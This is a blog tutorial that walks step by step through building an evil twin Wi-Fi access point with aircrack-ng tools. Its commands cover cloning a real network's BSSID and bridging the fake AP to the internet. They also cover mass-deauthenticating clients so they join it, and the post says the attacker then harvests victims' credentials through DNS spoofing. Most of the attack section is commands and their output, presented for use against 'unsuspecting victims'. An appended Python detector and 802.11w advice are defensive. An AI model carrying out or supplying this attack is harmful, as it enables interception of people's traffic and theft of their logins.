
How to Create an Evil Twin Access Point; Step-by-Step Guide

Step-by-Step Guide: Creating an Evil Twin

An Evil Twin Access Point is a malicious wireless access point that is set up to mimic a legitimate one. It can be used to intercept sensitive information such as login credentials, credit card information, and other private data.

In this post, I will provide a step-by-step guide on how to create an Evil Twin Access Point. You will learn how to set up a fake access point that looks like the real one, and how to intercept data from unsuspecting victims.

Follow our guide and learn how to create an Evil Twin Access Point in just a few easy steps.

*What is an Evil Twin Access Point?*

An evil twin is a fake wireless access point that appears as a genuine hotspot offered by a legitimate provider. The idea is to set up a malicious wireless network with the same SSID name as the original one.

Devices such as laptops, tablets, and smartphones that connect to a Wi-Fi network have no way to distinguish between two Wi-Fi networks with the same SSID name. This enables hackers to set up malicious wireless networks that can capture traffic and extract sensitive information from victims.

*Enable Monitor Mode*

To start with this tutorial, ensure that your wireless card is compatible with the aircrack-ng suite and has monitor mode enabled.

Aircrack-ng is a popular suite of tools used to crack wireless networks. It includes aircrack-ng (for cracking WEP and WPA-PSK keys), airmon-ng (for setting up monitor mode on wireless cards), and airodump-ng (for capturing wireless traffic).

Aircrack-ng is an open-source project and is available for Windows, Linux, and macOS. You can verify if it's functioning correctly by entering the following command:

    airmon-ng check kill

This command will check if the wireless card is supported by the aircrack-ng suite and also disable any processes that may interfere with it.

The next step is to enable monitor mode on your wireless interface.
This can be accomplished by executing the airmon-ng start wlan0 command:

    airmon-ng start wlan0

This will change wlan0 to wlan0mon, which indicates that your wireless interface is now in monitor mode.

*Locate the Target Wireless Network*

The second step is to start scanning nearby wireless routers and locate the Wi-Fi network which you want to clone. Execute the following command:

    airodump-ng wlan0mon

    CH 6 ][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2014-05-20 11:10

    BSSID              PWR  Beacons  #Data, #/s  CH  MB   ENC   CIPHER  AUTH  ESSID

    28:EF:01:34:64:92  -29       19       1    0   6  54e  WPA2  CCMP    PSK   Linksys
    28:EF:01:35:34:85  -42       17       0    0   6  54e  WPA2  CCMP    PSK   SkyNet
    28:EF:01:34:64:91  -29       19       1    0   1  54e  WPA2  CCMP    PSK   TP-LINK
    28:EF:02:33:38:86  -42       17       0    0  11  54e  WPA2  CCMP    PSK   CISCO-Net

    BSSID              STATION            PWR  Rate   Lost  Packets  Probes

    28:EF:01:35:34:85  28:EF:01:23:46:68  -57  0 - 1     0        1

The wireless network I will be cloning in this tutorial is the SkyNet network with BSSID 28:EF:01:35:34:85 and channel 6.

*Create the Evil Twin*

Once you’ve found the network which you wish to clone, run the following command in another terminal:

    airbase-ng -a 28:EF:01:35:34:85 -e SkyNet -c 6 wlan0mon

    $ airbase-ng -a 28:EF:01:35:34:85 --essid SkyNet -c 6 wlan0mon
    21:39:29 Created tap interface at0
    21:39:29 Trying to set MTU on at0 to 1500
    21:39:29 Trying to set MTU on wlan0mon to 1800
    21:39:29 Access Point with BSSID 28:EF:01:35:34:85 started.

This command creates an Evil Twin network with the SSID name SkyNet; however, it will not be able to provide internet access yet.

*Provide Internet Access to the Evil Twin*

I will add the bridge interface, called fake; you can name it any way you like.

    brctl addbr fake

Now add the two interfaces you’re bridging, eth0 and at0 (make sure eth0 has internet access).

    brctl addif fake eth0
    brctl addif fake at0

Assign IP addresses to the interfaces and bring them up using ifconfig:

    ifconfig at0 0.0.0.0 up
    ifconfig fake up

You can take a look at the bridge network interface with ifconfig:

    ifconfig

    at0       Link encap:Ethernet  HWaddr 74:85:2a
              inet6 addr: fe80::7685:2aff:5b08/64 Scope:Link
              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
              RX packets:4 errors:0 dropped:0 overruns:0 frame:0
              TX packets:349 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:500
              RX bytes:540 (540.0 B)  TX bytes:54845 (53.3 KiB)

    eth0      Link encap:Ethernet  HWaddr c8:bc:c8
              inet addr:10.0.0.19  Bcast:10.0.0.255  Mask:255.255.255.0
              inet6 addr: fe80::cabc:a6c1/64 Scope:Link
              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
              RX packets:640 errors:0 dropped:0 overruns:0 frame:0
              TX packets:529 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:1000
              RX bytes:457344 (446.6 KiB)  TX bytes:94347 (92.2 KiB)
              Interrupt:17

    fake      Link encap:Ethernet  HWaddr 74:85:2a
              inet addr:10.0.0.194  Bcast:10.0.0.255  Mask:255.255.255.0
              inet6 addr: fe80:::fe97:5b08/64 Scope:Link
              inet6 addr: 2601:d335:7685:2aff:fe97:5b08/64 Scope:Global
              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
              RX packets:859 errors:0 dropped:0 overruns:0 frame:0
              TX packets:684 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:0
              RX bytes:492405 (480.8 KiB)  TX bytes:130130 (127.0 KiB)

*Kick Wireless Clients from the Legitimate AP*

The next step is to kick wireless clients off the legitimate AP; in my case, that’s the SkyNet network. You can do this by using aireplay-ng.

    aireplay-ng --deauth 1000 -a 28:EF:01:35:34:85 wlan0mon

This command kicks wireless clients from the real access point network, forcing them to connect to the malicious access point.

As you can see in the output below, a client has associated with my evil twin.
This information is found in the airbase-ng terminal (client 28:EF:01:23:46:68 associated).

    $ airbase-ng -a 28:EF:01:35:34:85 --essid SkyNet -c 6 wlan0mon
    14:50:56 Created tap interface at0
    14:50:56 Trying to set MTU on at0 to 1500
    14:50:56 Trying to set MTU on wlan5 to 1800
    14:50:56 Access Point with BSSID 28:EF:01:35:34:85 started.
    14:58:55 Client 28:EF:01:23:46:68 associated (WPA2;CCMP) to ESSID: "SkyNet"
    15:03:24 Client 28:EF:01:23:46:68 associated (WPA2;CCMP) to ESSID: "SkyNet"

At this point, all of the victim’s traffic passes through the attacker’s machine. Because this is technically a Man-in-the-Middle attack, the attacker can capture sensitive information.

The attacker can perform various attacks like DNS spoofing, which redirects the victim to a cloned or fake login page. Once the victim tries to log in, the hacker harvests the credentials.

*Conclusion*

In today's digital age, using public Wi-Fi networks has become a common practice for many people. However, it's important to be aware of the risks associated with connecting to these networks, as they can be vulnerable to cyber-attacks and hacking attempts.
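
From the defender's side, the steps above leave two observable signs on the air: a burst of deauthentication frames against the real BSSID, and a second radio answering for the same BSSID. The following is an added example, not part of the original post, that checks a list of frame records for both signs; the record layout, the thresholds, the function names and the sample frames are assumptions made for illustration.

```python
from collections import defaultdict

BSSID = "28:EF:01:35:34:85"  # the SkyNet BSSID from the scan above
# Constructed sample records, not a real capture:
# (time_ms, frame_type, bssid, essid, channel, encryption)
FRAMES = [
    (0, "beacon", BSSID, "SkyNet", 6, "WPA2"),
    (50, "beacon", "28:EF:01:34:64:92", "Linksys", 6, "WPA2"),
    (900, "beacon", BSSID, "SkyNet", 6, "OPN"),  # second radio, different profile
] + [(2000 + 10 * i, "deauth", BSSID, None, 6, None) for i in range(200)]


def conflicting_beacons(frames):
    """BSSIDs whose beacons advertise more than one (essid, channel, enc) profile."""
    profiles = defaultdict(set)
    for _, ftype, bssid, essid, channel, enc in frames:
        if ftype == "beacon":
            profiles[bssid].add((essid, channel, enc))
    return {b: p for b, p in profiles.items() if len(p) > 1}


def deauth_bursts(frames, window_ms=1000, threshold=20):
    """BSSIDs with more than `threshold` deauth frames in any sliding window."""
    times = defaultdict(list)
    for t, ftype, bssid, *_ in frames:
        if ftype == "deauth":
            times[bssid].append(t)
    alerts = {}
    for bssid, ts in times.items():
        ts.sort()
        start = peak = 0
        for end, t in enumerate(ts):
            while t - ts[start] > window_ms:  # drop frames older than the window
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:  # threshold is an assumed tuning value
            alerts[bssid] = peak
    return alerts


def assess(frames):
    """Combine both signals into one finding per BSSID."""
    clones, floods = conflicting_beacons(frames), deauth_bursts(frames)
    return {b: {"conflicting_beacons": b in clones, "deauth_peak": floods.get(b, 0)}
            for b in set(clones) | set(floods)}


if __name__ == "__main__":
    for bssid, finding in assess(FRAMES).items():
        print(bssid, finding)
```

A sensor would feed these functions frames parsed from its own monitor-mode capture. Enabling Protected Management Frames (802.11w) on the real network is the corresponding mitigation for the forged deauthentication step.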



This post first appeared on VedVyas Articles.
